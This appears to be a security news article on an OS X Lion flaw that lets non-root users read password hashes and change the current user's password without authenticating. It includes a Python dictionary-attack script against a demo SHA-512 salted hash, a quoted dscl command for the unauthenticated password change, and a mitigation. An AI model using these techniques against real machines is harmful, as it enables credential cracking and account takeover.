Patrick Dunstan of the Defence in Depth portal says that back in 2009 he posted a feature on cracking passwords on Mac OS X 10.6 and earlier editions of the Mac operating system.
In those versions of OS X, he says, the process for extracting user password hashes has been the same: obtain the user's GeneratedUID, then use that ID to pull the hashes out of that user's shadow file.
When it comes to Lion, the general premise is the same, although with a few technical differences, he says: each user still has their own shadow file, and each shadow file is stored as a .plist file under /var/db/dslocal/nodes/Default/users/.
“The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege - typically root. So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their [hash database] shadow file whose data is accessible only by the root user… or at least it should be”, he says in his latest security posting.
Dunstan goes on to assert that, in the redesign of OS X Lion's authentication scheme, a critical step has been overlooked: whilst non-root users are unable to read the shadow files directly, Lion still gives non-root users a way to view the password hash data.
This is accomplished, he says, by extracting the data straight from Directory Services rather than from the shadow files on disk.
Although Dunstan says that the current crop of Mac password crackers (from the darker side of the internet, Infosecurity notes) do not support the SHA512 plus four-byte salt password hash structure used by OS X Lion, he has written his own simple Python script to do the job, which he is offering for download.
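To make the hash structure concrete, here is an added Python example (written for this article, not Dunstan's script) that builds a blob of the shape described above, a four-byte salt followed by a SHA-512 digest, and runs a dictionary attack against it. It assumes that the digest is SHA-512 over the salt prepended to the UTF-8 password and that the blob is handled as hex; the wordlist and the target password are constructed for the demonstration.

```python
import hashlib
import secrets
from typing import Iterable, Optional, Tuple

SALT_LEN = 4      # four-byte salt, as described in the article
DIGEST_LEN = 64   # SHA-512 produces 64 bytes

# Constructed wordlist for the demonstration (not a real dictionary file).
WORDLIST = ["letmein", "password", "qwerty", "hunter2", "correct horse"]


def make_lion_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Return hex(salt || sha512(salt || password)).

    The salt-before-password layout is an assumption of this example;
    the article only states 'SHA512 plus a four-byte salt'.
    """
    if salt is None:
        salt = secrets.token_bytes(SALT_LEN)
    if len(salt) != SALT_LEN:
        raise ValueError(f"salt must be {SALT_LEN} bytes")
    digest = hashlib.sha512(salt + password.encode("utf-8")).digest()
    return (salt + digest).hex()


def split_lion_hash(blob_hex: str) -> Tuple[bytes, bytes]:
    """Split a hex blob into (salt, digest), rejecting malformed input."""
    raw = bytes.fromhex(blob_hex)
    if len(raw) != SALT_LEN + DIGEST_LEN:
        raise ValueError(
            f"expected {SALT_LEN + DIGEST_LEN} bytes, got {len(raw)}"
        )
    return raw[:SALT_LEN], raw[SALT_LEN:]


def crack_lion_hash(blob_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: re-hash each candidate with the extracted salt.

    Returns the matching word, or None if the dictionary is exhausted
    (the 'out of luck' case the article goes on to discuss).
    """
    salt, digest = split_lion_hash(blob_hex)
    for word in wordlist:
        candidate = word.rstrip("\r\n")
        if hashlib.sha512(salt + candidate.encode("utf-8")).digest() == digest:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed target: a weak password hashed with a fixed demo salt.
    target = make_lion_hash("hunter2", salt=b"\x01\x02\x03\x04")
    print("blob:", target)
    print("cracked:", crack_lion_hash(target, WORDLIST))
    print("strong password:", crack_lion_hash(make_lion_hash("Tr0ub4dor&3!"), WORDLIST))
```

A salted hash still defeats precomputed tables, but a single unstretched SHA-512 per guess means a dictionary run against the whole user database costs roughly one hash per candidate per user, which is why reading the blob as an unprivileged user matters.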
“Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user”, he says.
“So, in order to change the password of the currently logged in user, simply use:
$ dscl localhost -passwd /Search/Users/bob
And voilà! You will be prompted to enter a new password without the need to authenticate.”
As a temporary measure to mitigate these attacks, before Apple releases a patch, Dunstan recommends that users restrict standard users' access to the dscl utility with the command '$ sudo chmod 100 /usr/bin/dscl', which leaves the binary executable by its owner, root, only.